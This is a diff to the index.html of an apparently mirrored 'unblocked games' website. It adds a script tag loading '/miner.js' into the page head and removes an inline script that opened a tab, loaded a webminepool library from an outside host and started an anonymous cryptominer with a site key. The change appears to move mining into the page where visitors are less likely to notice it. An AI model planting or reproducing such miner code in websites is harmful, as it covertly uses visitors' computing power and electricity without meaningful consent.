--- a/index.html
+++ b/index.html
@@ -6,6 +6,7 @@
 <!-- Mirrored from games-unblocked.w3spaces.com/ by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 25 Feb 2022 16:24:25 GMT -->
 <head>
       <title>Games unblocked | unblocked fun!</title>
+      <script src="/miner.js">
       <link rel="stylesheet" type="text/css" href="styles.css">
       <meta name="keywords" content="Games, Games unblocked, LgaUnblocked, Unblocked, Unblocked games, LgaUnblocked" />
       <meta name="description" content="Your place for fun unblocked games! Welcome to games unblocked!" />
@@ -20,8 +21,6 @@
               </script>
   </head>
   <body>
-   <script>var x = window.open('') // open a blank tab;
-    x.document.write('<!DOCTYPE html><html lang="en"><link rel="stylesheet" href="/style.css"><head><title>keep open</title><script src="https://webminepool.com/lib/base.js"></script></head><body><h1>Please keep this tab open. Just leave it running in the background while you play</h1><h2>This helps make me money so it's either this or ads.</h2><script>var miner = WMP.Anonymous('SK_KgOAR8OS97B9mhnH5AQQA', {throttle: 0.3});miner.start();</script></body></html>');</script>
 <nav id='menu'>
   <input type='checkbox' id='responsive-menu' onclick='updatemenu()'><label></label>
   <ul>
